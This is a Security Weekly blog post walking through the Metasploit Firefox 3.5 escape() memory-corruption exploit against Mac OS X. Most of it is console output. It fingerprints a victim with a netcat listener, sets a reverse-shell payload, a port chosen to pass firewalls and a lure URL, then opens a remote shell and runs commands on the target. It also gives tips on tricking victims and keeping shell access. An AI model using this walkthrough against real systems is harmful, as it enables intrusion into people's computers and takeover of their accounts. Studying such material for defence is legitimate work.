Security Weekly

Metasploit Firefox 3.5 Escape () Value Exploit has been Improved

The exploit that was covered recently in an earlier blog post on the Firefox 3.5 escape () value memory corruption exploit that worked against Windows XP, this exploit has now been expanded to now cover OSX 10.5.7 and it has been improved so no script problem message is shown to the user requiring interaction by him. For use against an OSX target the attack might look something like this:

[email protected]:~/svn/msf3-dev$ sudo nc -vv -l -p 80
[sudo] password for carlos: 
listening on [any] 80 ...
connect to [] from carlos-perezs-computer.local [] 58924
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

^C sent 0, rcvd 370

Here the target was trick initially to connect to a Netcat listener so we could look at the User Agent string to identify the target OS and Browser, this could have been also easily done creating a fake webpage and having the victim connect and look at the logs or a sniffer capture. We continue by launching Metasploit, selecting the exploit, payload and setting the proper target:

[email protected]:~/svn/msf3-dev$ sudo ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     _/ __    ____    /  ___/____ |  |  /  _ |     __
|  Y Y    ___/|  |  / __ ____  |  |_> >  |_(  <_> )  ||  |
|__|_|  /___  >__| (____  /____  >|   __/|____/____/|__||__|
      /     /          /     / |__|

       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux

msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) >  show targets

Exploit targets:

   Id  Name                                      
   --  ----                                      
   0   Firefox 3.5.0 on Windows XP SP0-SP3       
   1   Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)  

msf exploit(firefox_escape_retval) > set TARGET 1
msf exploit(firefox_escape_retval) > set PAYLOAD osx/x86/vforkshell_reverse_tcp
PAYLOAD => osx/x86/vforkshell_reverse_tcp
msf exploit(firefox_escape_retval) > set LHOST

As it can be seen the payload selected was the vforkshell and one of the main advantages of this shell is that since it uses the vfork() Unix call to spawn it self it does not run under the process exploited so when the target kills the hanged browser we do not loose our shell access. Since we launched the exploit as root we can change the port to listen for the exploit to port 80 making it easier to exploit a target behind a Proxy or Firewall, change the URI path to one less suspicious and launch the exploit:

msf exploit(firefox_escape_retval) > set SRVPORT 80
msf exploit(firefox_escape_retval) > set URIPATH secretdocumets.html
URIPATH => secretdocumets.html
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) > 
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Using URL:
[*]  Local IP:
[*] Server started.

Once the targets connects to our exploit it will launch the exploit javascript code with the payload:

[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to
[*] Command shell session 1 opened ( ->

Once the shell is created we can interact with it, one important thing to remember is that environment variables set for the shell are the ones for the process exploited so we will have to use full path when calling certain commands:

msf exploit(firefox_escape_retval) > sessions -l

Active sessions

  Id  Description    Tunnel                                     
  --  -----------    ------                                     
  1   Command shell ->  

msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...

uid=501(labuser) gid=501(labuser) groups=501(labuser),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
uname -a
Darwin testmac.local 9.7.0 Darwin Kernel Version 9.7.0: Tue Mar 31 22:52:17 PDT 2009; root:xnu-1228.12.14~1/RELEASE_I386 i386
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 
	inet netmask 0xff000000 
	inet6 ::1 prefixlen 128 
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
	ether 00:16:cb:9f:9e:11 
	media: autoselect status: inactive
	supported media: autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP <full-duplex,hw-loopback> 10baseT/UTP <full-duplex,flow-control> 100baseTX <half-duplex> 100baseTX <full-duplex> 100baseTX <full-duplex,hw-loopback> 100baseTX <full-duplex,flow-control> 1000baseT <full-duplex> 1000baseT <full-duplex,hw-loopback> 1000baseT <full-duplex,flow-control> none
fw0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2030
	lladdr 00:17:f2:ff:fe:71:a7:b4 
	media: autoselect <full-duplex> status: inactive
	supported media: autoselect <full-duplex>
	inet6 fe80::217:f2ff:fe99:d7cf%en1 prefixlen 64 scopeid 0x6 
	inet netmask 0xffffff00 broadcast
	ether 00:17:f2:99:d7:cf 
	media: autoselect status: active
	supported media: autoselect
	ether 00:16:cb:33:3e:50 
	media: autoselect status: inactive
	supported media: none autoselect 10baseT/UTP <half-duplex>
	inet netmask 0xffffff00 broadcast
	ether 00:50:56:c0:00:08 
	inet netmask 0xffffff00 broadcast
	ether 00:50:56:c0:00:01 

[*] Command shell session 1 closed.

This exploit will be added to the Browser Autopwn module in Metasploit after Defcon 17.

Carlos Perez

Carlos is currently the Principal Consultant, Team Lead for Research at TrustedSec and well-known for his research on both Metasploit and Windows Powershell. His blog carries the tag line: “Shell Is Only The Beginning”.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.